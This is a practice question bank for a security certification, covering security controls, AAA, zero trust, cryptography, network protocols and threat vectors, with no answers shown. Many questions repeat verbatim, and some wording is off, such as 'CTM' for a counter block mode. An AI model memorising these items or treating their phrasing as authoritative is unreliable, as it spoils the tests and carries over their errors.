• IDSs

• Configuration management

• Firewalls

Which of the following answers refer to the characteristic features of managerial security controls?
(Select 3 answers)

• Also known as administrative controls

• Sometimes referred to as logical security controls

• Focused on reducing the risk of security incidents

• Executed by computer systems (instead of people)

• Documented in written policies

• Focused on protecting material assets

Examples of managerial security controls include: (Select 3 answers)

• Configuration management

• Data backups

• Organizational security policy

• Risk assessments

• Security awareness training

Which of the answers listed below can be used to describe operational security controls (Select 3
answers)

• Also known as administrative controls

• Focused on the day-to-day procedures of an organization

• Executed by computer systems (instead of people)

• Used to ensure that the equipment continues to work as specified

• Focused on managing risk

• Primarily implemented and executed by people (as opposed to computer systems)

Which of the following examples fall into the category of operational security controls? (Select 3 answers)

• Risk assessments

• Configuration management

• System backups

• Authentication protocols

• Patch management

Which of the answers listed below refers to security controls designed to deter, detect, and prevent
unauthorized access, theft, damage, or destruction of material assets?

• Managerial security controls

• Physical security controls

• Technical security controls

• Operational security controls

Which of the following examples do not fall into the category of physical security controls? (Select 3
answers)

• Lighting

• Access control vestibules

• Data backups

• Fencing/Bollards/Barricades

• Firewalls

• Security guards

• Asset management

What are the examples of preventive security controls? (Select 3 answers)

• Encryption

• IDS

• Sensors

• Firewalls

• Warning signs

• AV software

Examples of deterrent security controls include: (Select 3 answers)

• Warning signs

• Sensors
 • Lighting

• Video surveillance

• Security audits

• Fencing/Bollards

Which of the answers listed below refer(s) to detective security control(s)? (Select all that apply)

• Lighting

• Log monitoring

• Sandboxing

• Security audits

• CCTV

• IDS

• Vulnerability scanning

Which of the following answers refer(s) to corrective security control(s)? (Select all that apply)

• Recovering data from backup copies

• Applying software updates and patches to fix vulnerabilities

• Developing and implementing IRPs to respond to and recover from security incidents

• Regularly reviewing logs for anomalies or patterns indicative of attacks

• Activating and executing DRPs to restore operations after a major incident

Which of the answers listed below refer(s) to compensating security control(s)? (Select all that apply)

• Backup power systems

• Video surveillance

• MFA

• Application sandboxing

• Network segmentation

The term "Directive security controls" refers to the category of security controls that are implemented
through policies and procedures.

• True

• False

Which of the following terms fall into the category of directive security controls? (Select 2 answers)

• IRP
 • AUP

• IDS

• MFA

• IPS

Which of the terms listed below can be used to describe the basic principles of information security?

• PKI

• AAA

• GDPR

• CIA

The term "Non-repudiation" describes the inability to deny responsibility for performing a specific action. In
the context of data security, non-repudiation ensures data confidentiality, provides
proof of data integrity, and proof of data origin.

• True

• False

Which of the following best applies to the concept of non-repudiation?

• Digital certificate

• MFA

• Hashing

• Encryption

Which type of user account violates the concept of non-repudiation?

• Standard user account

• Shared account

• Guest user account

• Service account

Which part of the AAA security architecture deals with the verification of the identity of a person or process?

• Authentication

• Authorization

• Accounting

In the AAA security architecture, the process of granting or denying access to resources is known as:
 • Authentication

• Authorization

• Accounting

In the AAA security architecture, the process of tracking accessed services as well as the amount of
consumed resources is called:

• Authentication

• Authorization

• Accounting

Which of the following solutions provide(s) the AAA functionality? (Select all that apply)

• CHAP

• TACACS+

• PAP

• RADIUS

• MS-CHAP

In the context of the AAA framework, common methods for authenticating people include: (Select 3
answers)

• IP addresses

• Usernames and passwords

• MAC addresses

• Biometrics

• MFA

Which of the answers listed below refer to common methods of device authentication used within the
AAA framework? (Select 3 answers)

• Usernames and passwords

• Digital certificates

• IP addresses

• MFA

• Biometric authentication

• MAC addresses

Which of the following terms describes the process of identifying differences between an organization's
current security posture and its desired security posture?

• Tabletop exercise
 • Gap analysis

• Security awareness training

• Risk assessment

The term "Zero Trust security" refers to a cybersecurity model that eliminates implicit trust from networks and
requires all users and devices to be continuously verified before being granted
access to resources. The implementation of the Zero Trust security involves two distinct
components: a Data Plane, responsible for defining and managing security policies, and a Control Plane,
responsible for enforcing the security policies established by the Data Plane.

• True

• False

Which of the answers listed below refers to a Zero Trust Control Plane security approach that takes into
account user identity, device security, network conditions, and other contextual information to
enable dynamic access decisions?

• Implicit trust

• Monitoring and logging

• Adaptive identity

• Microsegmentation

What are the key components of the Zero Trust Control Plane's Policy Decision Point (PDP)? (Select 2
answers)

• Policy Engine (PE)

• Monitoring and logging

• Policy Enforcement Point (PEP)

• Microsegmentation

• Policy Administrator (PA)

In the Zero Trust security architecture, the Policy Enforcement Point (PEP) is a Data Plane
component that enforces the security policies defined at the Control Plane by the Policy Decision Point
(PDP).

• True

• False

An access control vestibule (a.k.a. mantrap) is a physical security access control system used to
prevent unauthorized users from gaining access to restricted areas. An example mantrap could be a
two-door entrance point connected to a guard station wherein a person entering from the
outside remains locked inside until he/she provides authentication token required to unlock the inner
door.

• True
 • False

Which of the following statements about honeypots are true? (Select 2 answers)

• Honeypots are always part of a honeynet

• Honeypots mimic real systems to attract cyber attackers

• Honeypots are a type of anti-malware solution

• Honeypots contain apparent vulnerabilities that are closely monitored by a security team

• Honeypots are used to launch attacks on cyber attackers

What is a honeynet in the context of cybersecurity?

• A network of IDSs

• A network of honeypots

• A network of infected hosts

• A network of IPSs

Which of the answers listed below refers to a honeynet example?

• A network of fake websites

• A network of fake servers

• A network of fake databases

• A network of fake file shares

• All of the above

A honeyfile can be any type of file (e.g., a document, email message, image, or video file) containing real
user data intentionally placed within a network or system to attract potential attackers or unauthorized
users.

• True

• False

A honeyfile can be used for:

• Attracting cyber attackers

• Triggering alerts when accessed

• Monitoring network activity

• All of the above

What is a honeytoken?

• A decoy file that is designed to attract attackers

• A unique identifier assigned to a honeyfile

 • A decoy system that is designed to lure potential attackers

• A unique identifier that is designed to track attackers

Which of the following should not be used as honeytokens? (Select all that apply)

• Active user account credentials

• Database entries mimicking real data

• Actual URLs to live websites or resources

• Dummy server logs with enticing information

• Fake identifiers, including usernames, passwords, email addresses, and IP addresses A

process used by organizations to assess and evaluate the potential impact of disruptive
incidents or disasters on their critical business functions and operations is referred to as:

• BPA

• BIA

• SLE

• BCP

A hierarchical system for the creation, management, storage, distribution, and revocation of digital
certificates is known as:

• PKI

• RA

• PKCS

• CA

Which of the answers listed below best describes the characteristics of a public-private key pair?

• Both keys are examples of a symmetrical key

• Two keys that are identical

• A pair of keys where one is used for encryption and the other for decryption

• Both keys are examples of a shared key

What is the typical use of a public key?

• Data encryption

• Data decryption

• User/device authentication

• All of the above

Key escrow is a cryptographic technique that enables storing copies of encryption keys with a trusted
third party. A Recovery Agent (RA) is a trusted third party (an individual, entity, or system)
who is authorized to assist in the retrieval of encryption keys and data on behalf of the data owner. Key
escrow and RA are both used to ensure that encrypted data can be decrypted even if the data owner
loses access to their encryption key. Since key escrow and RAs are both components of a
single security solution, the only way to implement key escrow systems is with the use of RAs.

• True

• False

Which of the following answers refers to a data storage device equipped with hardware-level
encryption functionality?

• HSM

• TPM

• EFS

• SED

Which of the answers listed below refers to software technology designed to provide confidentiality for
an entire data storage device?

• TPM

• FDE

• EFS

• HSM

An MS Windows component that enables encryption of individual files is called:

• SED

• EFS

• BitLocker

• FDE

Which of the following software application tools are specifically designed for implementing encryption
algorithms to secure data communication and storage? (Select 2 answers)

• VPN

• GPG

• SSH

• IPsec

• PGP

What is the name of a network protocol that secures web traffic via SSL/TLS encryption?

• SFTP

• HTTPS
 • FTPS

• SNMP

Which of the answers listed below refers to a deprecated TLS-based method for secure transmission
of email messages?

• S/MIME

• STARTTLS

• DKIM

• SMTPS

Which of the following answers refers to an obsolete protocol used for secure data transfer over the
web?

• SMTPS

• SRTP

• SHTTP

• S/MIME

Which of the following acronyms refers to software or hardware-based security solutions

designed to detect and prevent unauthorized use and transmission of confidential information?

• IPS

• DLP

• IDS

• DEP

A rule-based access control mechanism implemented on routers, switches, and firewalls is referred
to as:

• ACL

• CSR

• MAC

• AUP

Which type of firmware performs initial hardware checks after the computer is powered on?

• BIOS

• POST

• CMOS

• PROM
Which of the answers listed below refers to a software technology designed to simplify network
infrastructure management?

• SDN

• QoS

• VDI

• CDN

Which of the following is an MS Windows component that enables encryption of individual files?

• EFS

• NTFS

• DFS

• NFS

A system that uses public network (such as the Internet) as a means for creating private encrypted
connections between remote locations is known as:

• WWAN

• VPN

• PAN

• VLAN

Which of the answers listed below refers to a security standard introduced to address the vulnerabilities
found in WEP?

• TKIP

• AES

• WPA

• CCMP

The term "KEK" refers to a type of cryptographic key often used in key management systems to add an
additional layer of security when encrypting and decrypting other cryptographic keys.

• True

• False

POP3 is used for:

• Name resolution

• Sending email messages

• File exchange

• Email retrieval
Which cloud service model would provide the best solution for a web developer intending to create a
web app?

• XaaS

• SaaS

• PaaS

• IaaS

Which of the following answers refers to a cryptographic hash function that has been widely used in the
past but is now considered deprecated for security-sensitive applications due to known
vulnerabilities?

• MD5

• SHA

• CRC

• HMAC

Which of the answers listed below refers to a suite of protocols and technologies providing encryption,
authentication, and data integrity for network traffic?

• TLS

• SSH

• IPsec

• VPN

A network protocol providing an alternative solution to the manual allocation of IP addresses is called:

• DNS

• SNMP

• NAT

• DHCP

Which of the following regulations protects the privacy and personal data of the EU citizens?

• PHI

• HIPAA

• PCI DSS

• GDPR

Which of the answers listed below refers to a mechanical data storage medium type that relies on magnetic
plates and moving parts for data storage and retrieval?

• RAM
 • HDD

• NVMe

• SSD

Which of the following terms refers to an environmental control system?

• SCADA

• HIPS

• TEMPEST

• HVAC

A type of network connecting computers within a small geographical area such as a building or group
of buildings is referred to as:

• PAN

• LAN

• MAN

• WAN

Which of the solutions listed below hides the internal IP addresses by modifying IP address information in
IP packet headers while in transit across a traffic routing device?

• QoS

• DHCP

• NAT

• DNS

Which of the following answers refers to a shared secret authentication method used in WPA, WPA2,
and EAP?

• PSK

• 802.1X

• SAE

• TKIP

Copies of lost private encryption keys can be retrieved from a key escrow by RAs (i.e., individuals with
access to key database and permission level allowing them to extract keys from escrow).

• True

• False

Which type of unsolicited messaging relies on text-based communication?

• VAM
 • SPIM

• JMS

• SPIT

Which of the answers listed below refers to a secure replacement for Telnet?

• CHAP

• FTP

• SNMP

• SSH

Which of the following answers refers to a family of cryptographic hash functions used in a variety of
security applications, including digital signatures, password storage, secure communications, and
data integrity verification?

• RSA

• IDEA

• AES

• SHA

In the AAA security architecture, the process of granting or denying access to resources is known as:

• Auditing

• Authentication

• Authorization

• Accounting

Which of the terms listed below applies to the authentication process?

• MFA

• MMC

• MDM

• MFD

Which of the following answers refer to NIPS? (Select 3 answers)

• Takes proactive measures to block or mitigate intrusion attempts

• Generates alerts and notifies security personnel or administrators when suspicious

activity is detected

• Operates in an inline mode, actively intercepting and inspecting network traffic

• Monitors network traffic without direct involvement in traffic routing or packet modification
 • Does not take direct action to block or prevent attacks

• It can drop or reject network packets, terminate connections, or take other actions to stop the
attack

Which of the terms listed below refers to threat intelligence gathered from publicly available sources?

• IoC

• OSINT

• RFC

• CVE/NVD

Which of the following answers refers to a common PnP interface that allows a PC to communicate
with peripherals and other devices?

• IDE

• PCIe

• USB

• eSATA

Which of the solutions listed below allows to check whether a digital certificate has been revoked?

• OCR

• CRL

• CSR

• OSPF

A type of computer security solution that allows to define and enforce network access policies is called:

• NAT

• ACL

• NAC

• DLP

Which of the following solutions alleviates the problem of the depleting IPv4 address space by allowing
multiple hosts on the same private LAN to share a single public IP address?

• DNS

• APIPA

• NAT

• DHCP
Which of the answers listed below refers to an individual or role responsible for overseeing and ensuring
compliance with data protection laws and policies within an organization?

• CTO

• DPO

• CIO

• CSO

Which of the following terms refers to an agreement that specifies performance requirements for a
vendor?

• MSA

• SLA

• MOU

• SOW

A legal contract between the holder of confidential information and another person to whom that
information is disclosed restricting that other person from disclosing the confidential information to any
other party is referred to as:

• ISA

• NDA

• BPA

• SLA

Which of the answers listed below refers to a protocol designed to secure data transmitted over WLANs?

• SCP

• IPsec

• SSH

• WTLS

Which of the following answers can be used to describe technical security controls? (Select 3
answers)

• Focused on protecting material assets

• Sometimes called logical security controls

• Executed by computer systems (instead of people)

• Also known as administrative controls

• Implemented with technology

• Primarily implemented and executed by people (as opposed to computer systems)

Which of the answers listed below refer to examples of technical security controls? (Select 3 answers)

• Security audits

• Encryption

• Organizational security policy

• IDSs

• Configuration management

• Firewalls

Which of the following answers refer to the characteristic features of managerial security controls?
(Select 3 answers)

• Also known as administrative controls

• Sometimes referred to as logical security controls

• Focused on reducing the risk of security incidents

• Executed by computer systems (instead of people)

• Documented in written policies

• Focused on protecting material assets

Examples of managerial security controls include: (Select 3 answers)

• Configuration management

• Data backups

• Organizational security policy

• Risk assessments

• Security awareness training

Which of the answers listed below can be used to describe operational security controls (Select 3
answers)

• Also known as administrative controls

• Focused on the day-to-day procedures of an organization

• Executed by computer systems (instead of people)

• Used to ensure that the equipment continues to work as specified

• Focused on managing risk

• Primarily implemented and executed by people (as opposed to computer systems)

Which of the following examples fall into the category of operational security controls? (Select 3 answers)

• Risk assessments

• Configuration management

• System backups

• Authentication protocols

• Patch management

Which of the answers listed below refers to security controls designed to deter, detect, and prevent
unauthorized access, theft, damage, or destruction of material assets?

• Managerial security controls

• Physical security controls

• Technical security controls

• Operational security controls

Which of the following examples do not fall into the category of physical security controls? (Select 3
answers)

• Lighting

• Access control vestibules

• Data backups

• Fencing/Bollards/Barricades

• Firewalls

• Security guards

• Asset management

What are the examples of preventive security controls? (Select 3 answers)

• Encryption

• IDS

• Sensors

• Firewalls

• Warning signs

• AV software

Examples of deterrent security controls include: (Select 3 answers)

• Warning signs

• Sensors
 • Lighting

• Video surveillance

• Security audits

• Fencing/Bollards

Which of the answers listed below refer(s) to detective security control(s)? (Select all that apply)

• Lighting

• Log monitoring

• Sandboxing

• Security audits

• CCTV

• IDS

• Vulnerability scanning

Which of the following answers refer(s) to corrective security control(s)? (Select all that apply)

• Recovering data from backup copies

• Applying software updates and patches to fix vulnerabilities

• Developing and implementing IRPs to respond to and recover from security incidents

• Regularly reviewing logs for anomalies or patterns indicative of attacks

• Activating and executing DRPs to restore operations after a major incident

Which of the answers listed below refer(s) to compensating security control(s)? (Select all that apply)

• Backup power systems

• Video surveillance

• MFA

• Application sandboxing

• Network segmentation

The term "Directive security controls" refers to the category of security controls that are implemented
through policies and procedures.

• True

• False

Which of the following terms fall into the category of directive security controls? (Select 2 answers)

• IRP
 • AUP

• IDS

• MFA

• IPS

A less formal document outlining mutual goals and cooperation established between two or more
parties is referred to as:

• MOA

• SOW

• MOU

• MSA

Which of the following answers refers to a global standard development organization composed of
different national standards bodies?

• NIST

• ISO

• IEEE

• ANSI

The term "SD-WAN" refers to a network technology that uses software to manage and optimize
network connections that extend over large geographic areas.

• True

• False

Which of the answers listed below refers to a dedicated programming language used in database
management?

• PHP

• C

• SQL

• JS

Which of the following devices fall(s) into the category of PEDs? (Select all that apply)

• Smartphone

• Tablet

• Desktop

• Mainframe
Which of the terms listed below is used to describe an average time required to repair a failed component or
device?

• MTTF

• RPO

• MTTR

• MTBF

Which of the following answers refers to a firewall type that improves upon first- and second-
generation firewalls by offering additional features, such as more in-depth inspection of network traffic
and application-level inspection?

• IDS

• Packet filter

• NGFW

• Stateful firewall

Which protocol enables secure, real-time delivery of audio and video over an IP network?

• S/MIME

• RTP

• SIP

• SRTP

Which of the answers listed below refers to a network security technology designed to monitor, detect, and
mitigate unauthorized access, security threats, and suspicious activities in WLANs?

• WIPS

• NIDS

• NIPS

• WIDS

Which of the following answers refers to a method for creating and verifying digital signatures?

• DHE

• AES

• DSA

• SHA

A type of legally binding contract that establishes the foundational terms and conditions governing
future agreements between two parties is known as:

• MOU
 • SLA

• MSA

• SOW

Which part of IPsec provides authentication, integrity, and confidentiality?

• SPD

• PFS

• AH

• ESP

Which of the answers listed below refers to a multi-protocol authentication framework frequently used
in 802.11 networks and point-to-point connections?

• PAP

• MS-CHAP

• EAP

• CHAP

Which of the following acronyms represents evidence that helps cybersecurity professionals detect
potential security incidents?

• APT

• IoC

• ATTCCK

• EDR

For a wireless client to be able to connect to a network, the security type (e.g., WEP, WPA, WPA2, or WPA3)
and encryption type (e.g., TKIP or AES) settings on the connecting host must match the corresponding
wireless security settings on a WAP.

• True

• False

Which of the answers listed below refers to an obsolete authentication protocol that sends passwords
in cleartext?

• PAP

• CHAP

• EAP

• MS-CHAP

Which of the following answers refers to an internal telephone exchange or switching system implemented
in a business or office?
 • POTS

• VoIP

• PBX

• PSTN

Which of the acronyms listed below refers to a maximum tolerable period of time required for restoring
business functions after a failure or disaster?

• SLA

• RTO

• AUP

• RPO

A computer network connecting multiple LANs over an area of a city is called:

• PAN

• SAN

• MAN

• CAN

Which cryptographic protocol is designed to provide secure communications over a computer

network and is the successor to SSL?

• WEP

• CCMP

• TLS

• AES

Which of the following answers refers to an embedded microcontroller used for secure boot, disk
encryption, and system integrity verification?

• TPM

• SoC

• UEFI

• HSM

Which of the answers listed below refer to IMAP? (Select 2 answers)

• Offers improved functionality in comparison to POP3

• Serves the same function as POP3

• Enables sending email messages from client devices

• Offers less functions than POP3

 • Enables email exchange between mail servers

Which cryptographic solution would be best suited for low-power devices, such as IoT devices, embedded
systems, and mobile devices?

• ECC

• DES

• RSA

• AES

The term "ASLR" refers to a technique used in modern OSs to enhance:

• Data redundancy

• System security

• Performance

• Storage capacity

Which of the following solutions provide the AAA functionality? (Select 2 answers)

• CHAP

• TACACS+

• PAP

• RADIUS

• MS-CHAP

Which of the acronyms listed below refers to a set of rules that specify which users or system
processes are granted access to objects as well as what operations are allowed on a given object?

• CRL

• NAT

• BCP

• ACL

A network admin can ping remote host by its IP address, but not by its domain name. Which of the following
is the most probable source of this problem?

• ICMP

• DNS

• HTTP

• DHCP

The role of a RA in PKI is to: (Select 2 answers)

• Accept requests for digital certificates

 • Validate digital certificates

• Authenticate the entity making the request

• Provide backup source for cryptographic keys

• Issue digital certificates

Which of the answers listed below refers to a generic term used to identify any resource?

• OUI

• URI

• OID

• URL

Which of the following answers refers to a framework widely used for enabling secure third-party access
to user accounts?

• SSO

• OAuth

• MFA

• SAML

An IV is a random or pseudorandom value used in cryptography to ensure that the same plaintext input
does not produce the same ciphertext output, even when the same encryption key is used. The IV is
typically used with encryption algorithms in block cipher modes to enhance security by introducing
randomness to the encryption process.

• True

• False

Which of the answers listed below refers to a security vulnerability that allows an attacker to inject malicious
code into input fields, such as search bars or login forms, to execute unauthorized commands on a
database?

• RCE

• SQLi

• XSS

• CSRF

What is the name of a mobile device deployment model in which employees select devices for
work-related tasks from a company-approved device list?

• VDI

• CYOD

• BYOD
 • COPE

Which of the following terms is used to describe sophisticated and prolonged cyberattacks often carried
out by well-funded and organized groups, such as nation-states?

• MitM

• APT

• XSRF

• DDoS

What is STIX?

• Vulnerability database

• Common language for describing cyber threat information

• US government initiative for real-time sharing of cyber threat indicators

• Transport mechanism for cyber threat information

The MIME specification extends the email message format beyond plain text, enabling the transfer of
graphics, audio, and video files over the Internet mail system. S/MIME is an enhanced version of the
MIME protocol that enables email security features by providing encryption, authentication, message
integrity, and other related services.

• True

• False

What is the name of a network protocol that enables secure file transfer over SSH?

• TFTP

• SFTP

• Telnet

• FTPS

SFTP is an extension of the FTP protocol that adds support for SSL/TLS encryption.

• True

• False

A type of cryptographic network protocol for secure data communication, remote command-line
login, remote command execution, and other secure network services between two networked
computers is known as:

• RDP

• SSH

• Telnet

• SCP
Which of the answers listed below refers to a suite of protocols and technologies providing encryption,
authentication, and data integrity for network traffic?

• TLS

• SSH

• IPsec

• VPN

Which part of IPsec provides authentication, integrity, and confidentiality?

• SPD

• PFS

• AH

• ESP

A system that uses public network (such as the Internet) as a means for creating private encrypted
connections between remote locations is referred to as:

• WWAN

• VPN

• PAN

• VLAN

Which protocol enables secure, real-time delivery of audio and video over an IP network?

• S/MIME

• RTP

• SIP

• SRTP

An encryption protocol primarily used in Wi-Fi networks implementing the WPA2 security standard is
called:

• TKIP

• CCMP

• SSL

• IPsec

A security protocol designed to improve the security of existing WEP implementations is known as:

• WPA2

• RC4
 • CCMP

• TKIP

Which of the following answers refer(s) to deprecated/insecure encryption protocols and cryptographic
hash functions? (Select all that apply)

• DES

• AES-256

• MD5

• ECC

• SHA-1

• SSL

• RC4

Which cryptographic protocol is designed to provide secure communications over a computer

network and is the successor to SSL?

• IPsec

• TLS

• AES

• CCMP

Examples of techniques used for encrypting information include symmetric encryption (also
called public-key encryption) and asymmetric encryption (also called secret-key encryption, or
session-key encryption).

• True

• False

In asymmetric encryption, any message encrypted with the use of a public key can only be decrypted
by applying the same algorithm and a matching private key (and vice versa).

• True

• False

Which of the algorithms listed below are not symmetric ciphers? (Select 3 answers)

• AES

• DES

• DHE

• ECC

• IDEA
 • RC4

• RSA

Which of the following algorithms do(es) not fall into the category of asymmetric encryption?
(Select all that apply)

• AES

• DES

• DHE

• ECC

• IDEA

• RC4

• RSA

The term "KEK" refers to a type of cryptographic key often used in key management systems to add an
additional layer of security when encrypting and decrypting other cryptographic keys.

• True

• False

Which of the answers listed below refers to a shared secret authentication method used in WPA, WPA2, and
EAP?

• PSK

• 802.1X

• SAE

• TKIP

Which of the following answers refers to a protocol used to set up secure connections and exchange
of cryptographic keys in IPsec VPNs?

• SSL

• IKE

• ESP

• DHE

Which of the answers listed below refers to a key exchange protocol that generates temporary keys for
each session, providing forward secrecy to protect past and future communications?

• PFS

• SHA

• PGP
 • DHE

Which of the following answers refers to a cryptographic key exchange protocol that leverages ECC
for enhanced security and efficiency?

• IKE

• ECDHE

• DHE

• ECDSA

Which of the answers listed below refers to a solution designed to strengthen the security of session
keys?

• ECB

• PFS

• EFS

• PFX

Which of the following answers refers to a public-key cryptosystem used for digital signatures, secure
key exchange, and encryption?

• ECC

• RSA

• PKI

• DSA

Which cryptographic solution would be best suited for low-power devices, such as IoT devices, embedded
systems, and mobile devices?

• ECC

• DES

• RSA

• AES

Which of the cryptographic algorithms listed below is the least vulnerable to attacks?

• AES

• DES

• RC4

• 3DES

Which of the following answers refers to a legacy symmetric-key block cipher encryption algorithm?
 • RC4

• DES

• RSA

• DSA

Which of the answers listed below refers to a deprecated stream cipher used in some legacy applications,
such as WEP?

• RSA

• DES

• SSL

• RC4

Which of the following answers refers to a deprecated (largely replaced by AES) symmetric-key block
cipher encryption algorithm?

• ECDSA

• RSA

• IDEA

• DSA

What is the recommended replacement for DES?

• DSA

• RSA

• RC4

• AES

An IV is a random or pseudorandom value used in cryptography to ensure that the same plaintext input
does not produce the same ciphertext output, even when the same encryption key is used. The IV is
typically used with encryption algorithms in block cipher modes to enhance security by introducing
randomness to the encryption process.

• True

• False

Which of the answers listed below refers to a logical operation commonly used in the context of
cybersecurity, particularly in encryption and obfuscation techniques?

• AND

• OR

• NOT

• XOR
Which of the following answers refers to a block cipher mode that works by chaining the ciphertext
blocks together, such that each ciphertext block depends on the previous block?

• CBC

• GCM

• ECB

• CFB

Which block mode transforms a block cipher into a stream cipher enabling the encryption of individual
bits or bytes of data?

• CFB

• CBC

• GCM

• ECB

A block cipher mode that combines a unique counter with encryption key to generate a stream of
pseudorandom data blocks which are then used for encrypting data is called:

• CBC

• GCM

• CFB

• CTM

Which of the block cipher modes listed below is the simplest/weakest and therefore not
recommended for use?

• CBC

• GCM

• ECB

• CTM

Which block cipher mode combines CTM for encryption with an authentication mechanism to ensure
both data confidentiality and integrity?

• CBC

• GCM

• ECB

• CFB

In cryptography, the number of bits in a key used by a cryptographic algorithm is referred to as key size or
key length. The key length determines the maximum number of combinations required to
break the encryption algorithm, therefore typically a longer key means stronger cryptographic security.

• True

• False

Which AES key length provides the highest level of security?

• 128-bit key

• 192-bit key

• 256-bit key

• 320-bit key

Which of the following answers refers to an embedded microcontroller used for secure boot, disk
encryption, and system integrity verification?

• TPM

• SoC

• UEFI

• HSM

Which of the answers listed below refers to a piece of hardware and associated
software/firmware designed to provide cryptographic and key management functions?

• EFS

• HSM

• SFC

• TPM

Which of the following answers refers to a centralized server that is used to distribute cryptographic
keys and authenticate users and services within a computer network?

• PKI

• RAS

• KDC

• NAS

In a Kerberos-protected network, this type of secure token is granted to users during their initial login
to enable them access to multiple network services without the need to re-enter their login
credentials.

• OTP

• TGT

• AS
 • TGS

In cryptography and security, the term "Secure enclave" typically refers to a protected and
isolated hardware or software environment within a computing device, such as a smartphone, tablet,
or computer, where sensitive data and cryptographic operations can be stored and
processed securely.

• True

• False

The term "Obfuscation" is used to describe techniques employed to obscure or hide the true
meaning or nature of data, making it challenging for unauthorized parties to decipher or reverse-
engineer the information.

• True

• False

What is the purpose of steganography?

• Checking data integrity

• Verifying hash values

• Hiding data within another piece of data

• Encrypting data

In the field of data security, the term "Tokenization" refers to the process of replacing sensitive data
with nonsensitive information which holds a reference to the original data and enables its processing
but has no value when breached.

• True

• False

Replacing password characters in a password field with a series of asterisks is an example of:

• Data masking

• Tokenization

• Anonymization

• Pseudo-anonymization

A hash function is a mathematical algorithm that maps data of arbitrary size to a fixed-size hash value,
typically represented as a short string of characters. The hash function result, also known as a digest or
checksum, provides a unique representation of the original data input. The
functionality of hash functions relies on the fact that if there is any change to the data after the original
hash was generated, the new hash value calculated after content modification will be
different from the original result because hash functions are designed to be sensitive to changes in the
input data.

• True
 • False

Hash functions find use in a variety of applications, including:

• Cryptography

• Data integrity verification

• Password verification and storage

• Digital signatures

• Blockchain technology

• All of the above

Which of the answers listed below refers to a cryptographic hash function that has been widely used in
the past but is now considered deprecated for security-sensitive applications due to known
vulnerabilities?

• MD5

• SHA

• CRC

• HMAC

Choose an answer from the drop-down list on the right to match a threat actor type on the left with its
common attack vector attribute.

Nation-state • Internal

• External

Unskilled attacker

Hacktivist

Insider threat

Organized crime

Shadow IT
Match each threat actor type with its corresponding resources/funding attribute.

Nation-state • Low resources and funding

• Low to medium resources and funding

• Low to high resources and funding

• Medium to high resources and funding

• High resources and funding

Unskilled attacker

Hacktivist

Insider threat

Organized crime

Shadow IT

Assign the level of sophistication attribute to each threat actor type listed below.

Nation-state

Unskilled attacker

Hacktivist

Insider threat

Organized crime

Shadow IT • Low level of sophistication

• Low to medium level of sophistication

• Low to high level of sophistication

• Medium to high level of sophistication

• High level of sophistication

From the drop-down list on the right, select the typical motivations behind the actions of each threat
actor type.

Nation-state - Select answer -

• Ethical beliefs, philosophical/political beliefs, disruption/chaos

• Disruption/chaos, financial gain, revenge

• Espionage, political/philosophical beliefs, disruption/chaos, war

• Convenience, lack of awareness of security risks, meeting specific

needs

• Financial gain, data exfiltration, extortion

• Revenge, financial gain, service disruption

Unskilled
attacker

Hacktivist

Insider threat

Organized crime

Shadow IT

Which of the following terms is used to describe sophisticated and prolonged cyberattacks often carried
out by well-funded and organized groups, such as nation-states?

• MitM

• APT

• XSRF

• DDoS

In IT security, the term "Shadow IT" is used to describe the practice of using IT systems, software, or
services within an organization without the explicit approval or oversight of the organization's IT
department.

• True

• False
 An attack surface is the sum of all the potential points (vulnerabilities) through which an attacker can
interact with or compromise a system or network, indicating the overall exposure to potential threats.
Examples of attack surfaces can be all software, hardware, and network interfaces with known
security flaws. A threat vector represents the method or means through which a cyber threat is
introduced or delivered to a target system. It outlines the pathway or avenue used by attackers to
exploit vulnerabilities. Common threat vector types include phishing emails, malware, drive-by
downloads, and social engineering techniques.

• True

• False

Which of the answers listed below refers to an email-based threat vector?

• Spoofing

• Phishing

• BEC attacks

• Malicious links

• Malware attachments

• All of the above

Which of the following terms refers to a threat vector commonly associated with SMS-based
communication?

• Phishing

• Vishing

• Smishing

• Pharming

Which of the answers listed below refers to an example of a potential threat vector in IM-based
communication?

• Phishing attack

• Malware distribution

• Spoofing attack

• Eavesdropping

• Account hijacking

• Malicious link/attachment

• All of the above

Which of the following answers refer to examples of image-based threat vectors? (Select 3 answers)

• Steganography

• BEC attacks

• Image spoofing (deepfakes)

• Brand impersonation

• Malware-embedded images

Which of the answers listed below refers to a file-based threat vector?

• PDF exploits

• Malicious macros in documents

• Compressed files (ZIP, RAR)

• Malicious scripts in web pages

• Infected images

• Malicious executables

• All of the above

Which of the following answer choices is an example of a threat vector type that is typical for voice
communication?

• Smishing

• Pharming

• Vishing

• Phishing

Examples of threat vectors directly related to the use of removable devices include: (Select 2
answers)

• Pretexting

• Malware delivery

• Watering hole attacks

• Data exfiltration

• Social engineering attacks

Which of the answers listed below refer(s) to client-based software threat vector(s)? (Select all that
apply)

• Drive-by download via web browser

• Malicious macro
 • Vulnerability in a network protocol or device

• USB-based attack

• Infected executable file

• Malicious attachment in email application

Which of the following answers refer to agentless software threat vectors? (Select 2 answers)

• Phishing email

• Malicious USB drive

• Network protocol vulnerability

• Infected macro

• Packet sniffing

Exploiting known vulnerability is a common threat vector for:

• Legacy systems/apps

• Unsupported systems/apps

• Newly released systems/apps

• Systems/apps with zero-day vulnerability

Which of the wireless technologies listed below are considered potential threat vectors and should
be avoided due to their known vulnerabilities? (Select all that apply)

• WPS

• WAP

• WPA

• WAF

• WPA2

• WEP

Which of the following answers refers to a threat vector characteristic only to wired networks?

• ARP Spoofing

• VLAN hopping

• Cable tapping

• Port sniffing

• All of the above

Examples of threat vectors related to Bluetooth communication include: bluesmacking (a type of DoS
attack that targets Bluetooth devices by overwhelming them with excessive traffic),
bluejacking (the practice of sending unsolicited messages or data to a Bluetooth-enabled device),
bluesnarfing (gaining unauthorized access to a Bluetooth device and data theft), and bluebugging
(gaining remote control over a Bluetooth device).

• True

• False

Which of the answers listed below refers to the most probable cause of an unauthorized access
caused by the exploitation of a specific network entry point?

• Outdated AV software

• Browser cookies

• Open service ports

• Insufficient logging and monitoring

The importance of changing default usernames and passwords can be illustrated by the example of
certain network devices (such as routers), which are often shipped with default and well-known admin
credentials that can be looked up on the web. Leaving the default credentials unchanged expands the
attack surface by providing an easy entry point for unauthorized access.

• True

• False

Which of the following answers refer to common threat vectors that apply to MSPs, vendors, and suppliers
in the supply chain? (Select 2 answers)

• Compliance violations

• Brand reputation damage

• Propagation of malware

• Operational disruptions

• Social engineering techniques

A social engineering technique whereby attackers under disguise of a legitimate request attempt to
gain access to confidential information is commonly referred to as:

• Phishing

• Smishing

• Pharming

• Spoofing
